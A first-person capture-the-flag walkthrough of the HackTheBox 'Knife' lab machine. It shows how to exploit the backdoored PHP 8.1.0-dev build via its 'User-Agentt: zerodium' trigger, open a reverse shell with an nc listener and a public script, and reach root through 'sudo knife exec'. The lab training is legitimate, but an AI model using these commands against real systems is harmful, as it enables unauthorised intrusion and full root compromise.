IP: 10.10.10.242

Box: https://app.hackthebox.eu/machines/Knife

Enumeration

Port Scan

TCP port scan with version detection

Web Server

View of the website

The webpage looks pretty standard. None of the links at the top are functional; it is a single static page with no forms or parameters, so there is no obvious surface for SQL injection or insecure direct object references. Let's run a gobuster scan to see if anything is hidden:

Not much to go off of here either

My next thought was directory traversal: trying to break out of the web root and read something like /etc/passwd. That did not work either.

Attempting directory traversal

Taking another look at the response headers, it turns out the server is running PHP, strangely enough, and an unusual build at that: the X-Powered-By header advertises PHP/8.1.0-dev, a development version:

Some googling shows that this is the build that carried the PHP source backdoor: in March 2021 the php-src repository was compromised and two malicious commits added a remote code execution backdoor to 8.1.0-dev. It was caught before any release shipped, but this server is running an affected build: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/.

The injected code (in ext/zlib/zlib.c) reads the User-Agentt request header (note the doubled t; this is not the standard User-Agent header) and, if its value contains the string 'zerodium', passes everything after those first eight bytes to zend_eval_string. So the payload must start with 'zerodium' followed by the PHP to run, with no <?php tag.

Further down, the article provides a Python script that turns this into a reverse shell against this particular version of PHP, found here.

Gaining RCE

Using the script, I open two terminal windows. In one I have nc -lvnp 4444 running; in the other:

python3 revshell_php_8.1.0-dev.py http://10.10.10.242 <my-ip> 4444  

and as soon as I hit enter, I get a shell as james@knife:

reverse shell

I found the user flag in /home/james/user.txt

PrivEsc

sudo -l shows that james can also run one program as root with no password:

That program is knife, the command-line tool for the Chef configuration-management suite, which is a very powerful automation tool to have running as root. Reading through the help, knife exec [SCRIPT] (options) lets us execute our own code: the online documentation says the script has to be Ruby, and that it can run shell commands.

Another resource I found shows how to spawn /bin/bash from Ruby:

exec "/bin/bash";

Putting those together (be sure to backslash the inner quotes, since the Ruby string sits inside a double-quoted shell string):

sudo /usr/bin/knife exec -E "exec \"/bin/bash\";"
voila, a root shell! It works because sudo starts knife as root and Ruby's exec replaces the knife process with /bin/bash, so the new shell keeps root privileges.

Conclusions

This was my first unassisted HackTheBox pwn! The starting-point machines walk you through and do not award points for pwning them.

I was definitely thrown off at first by how simple the initial web page was; it took going back to examine the headers to see it was running PHP at all, let alone a very exploitable build. Once I found that out, it fast-tracked the rest of the exercise!
